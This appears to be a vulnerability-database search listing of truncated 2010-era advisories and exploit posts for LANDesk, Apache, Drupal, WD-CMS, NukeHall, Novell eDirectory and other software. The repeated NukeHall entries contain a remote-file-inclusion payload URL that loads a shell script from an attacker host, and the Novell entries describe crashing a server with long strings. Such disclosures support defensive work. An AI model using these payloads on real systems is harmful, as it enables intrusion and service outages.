6335 matches found
Core Security Technologies Advisory 2010.0104
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ LANDesk command injection 1. Advisory Information Title: LANDesk command injection Advisory Id: CORE-2010-0104 Advisory URL:...
Mod_proxy From Apache 1.3 Integer Overflow
Name: Modproxy from apache 1.3 - Integer overflow which causes heap overflow. Author: Adam Zabrocki or Date: Jan 27, 2010 Issue: Modproxy from apache 1.3.xx tested on latest version - 1.3.41 allows local and remote attackers to overflow buffer on heap via integer overflow vulnerability...
Sql injection
SQL injection vulnerability in modules/arcade/index.php in PHP MySpace Gold Edition 8.0 and 8.10 allows remote attackers to execute arbitrary SQL commands via the gid parameter in a playgame action. NOTE: some of these details are obtained from third party information...
Important: Red Hat Security Advisory: kernel security and bug fix update
Updated kernel packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 5. This update has been rated as having important security impact by the Red Hat Security Response Team. The kernel packages contain the Linux kernel, the core of any Linux...
Mandriva Update for mkinitrd MDVA-2010:032 (mkinitrd)
Check for the Version of mkinitrd OpenVAS Vulnerability Test Mandriva Update for mkinitrd MDVA-2010:032 mkinitrd Authors: System Generated Check Copyright: Copyright c 2010 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it...
Mandriva Update for mkinitrd MDVA-2010:032 (mkinitrd)
Check for the Version of mkinitrd OpenVAS Vulnerability Test Mandriva Update for mkinitrd MDVA-2010:032 mkinitrd Authors: System Generated Check Copyright: Copyright c 2010 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it...
WD-CMS 3.0 XSS / File Disclosure
Exploit Title: WD-CMS 3.0 Multiple Vulnerabilities Date: December 31st, 2009 Author: Sora Software Link: http://www.webdiamond.net/cms.html Version: 3.0 Tested on: Windows Vista and Linux Backtrack 3 --------------------------------------------------------------- WD-CMS 3.0 Multiple Vulnerabiliti...
WD-CMS 3.0 - Multiple Vulnerabilities
WD-CMS 3.0 - Multiple Vulnerabilities Exploit Title: WD-CMS 3.0 Multiple Vulnerabilities Date: December 31st, 2009 Author: Sora Software Link: http://www.webdiamond.net/cms.html Version: 3.0 Tested on: Windows Vista and Linux Backtrack 3...
WD-CMS 3.0 Multiple Vulnerabilities
Exploit for unknown platform in category web applications =================================== WD-CMS 3.0 Multiple Vulnerabilities =================================== Exploit Title: WD-CMS 3.0 Multiple Vulnerabilities Date: December 31st, 2009 Author: Sora Software Link:...
Pandora FMS Monitoring Application 2.1.x 3.x - SQL Injection
Pandora FMS Monitoring Application 2.1.x 3.x - SQL Injection PenTest Information: ==================== GESEC Teamsmash & rem0ve discover a SQL Injection Vulnerability on Pandora FMS Monitoring Software. Attackers can manipulate the application DBMS over a remote sql-injection vulnerability. Detai...
Drupal 5.x / 6.x Core XSS
The text of this advisory is also available at http://www.madirish.net/?article=441 Description of Vulnerability: - - ----------------------------- Drupal http://drupal.org is a robust content management system CMS written in PHP and MySQL that provides extensibility through various third party...
Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability
Exploit for unknown platform in category web applications ================================================== Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability ================================================== Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability Created By 1nd0n3s14n l4m3r c --...
Remote file inclusion
PHP remote file inclusion vulnerability in modules/pms/index.php in Ciamos CMS 0.9.5 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the modulepath parameter...
NukeHall 0.3 - Multiple Remote File Inclusions
NukeHall 0.3 - Multiple Remote File Inclusions Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg NukeHall PoC : http://server/path/admin/modules/blocks.php?spawroot=http://attacker.com/shell.txt?cmd Vuln : ./nukehall0.3/admin/modules/messages.php line 28 PoC :...
NukeHall 0.3 - Multiple Remote File Inclusions
Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg NukeHall PoC : http://server/path/admin/modules/blocks.php?spawroot=http://attacker.com/shell.txt?cmd Vuln : ./nukehall0.3/admin/modules/messages.php line 28 PoC :...
NukeHall 0.3 Remote File Inclusion
Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg NukeHall PoC : http://0wn3d.com/path/admin/modules/blocks.php?spawroot=http://attacker.com/shell.txt?cmd Vuln : ./nukehall0.3/admin/modules/messages.php line 28 PoC :...
Novell eDirectory 8.8 SP5 Denial Of Service
Product: Novell eDirectory 8.8 sp5 for Windows Vulnerability: Denial of Service Discussion: Vulnerability in '/dhost/modules?I:' Sending long strings to '/dhost/modules?I:' causes a DoS crashing dhost.exe Also in last weeks published another bug in 'modules?L:' It is not patched yet too.. Credits...
Movable Type mt-check.cgi System Information Disclosure
The Movable Type installation on the remote web server is leaking information via mt-check.cgi. This CGI determines if the Perl modules required by Movable Type are installed, and is only intended to be used prior to installation. It discloses path information, operating system type, Perl version...
Novell eDirectory 8.8 SP5 Denial of Service
No description provided by source. Product: Novell eDirectory 8.8 sp5 for Windows Vulnerability: Denial of Service Discussion: Vulnerability in '/dhost/modules?I:' Sending long strings to '/dhost/modules?I:' causes a DoS crashing dhost.exe Also in last weeks published another bug in 'modules?L:' ...
Novell eDirectory 8.8 SP5 Denial of Service
Product: Novell eDirectory 8.8 sp5 for Windows Vulnerability: Denial of Service Discussion: Vulnerability in '/dhost/modules?I:' Sending long strings to '/dhost/modules?I:' causes a DoS crashing dhost.exe Also in last weeks published another bug in 'modules?L:' It is not patched yet too.. Credits...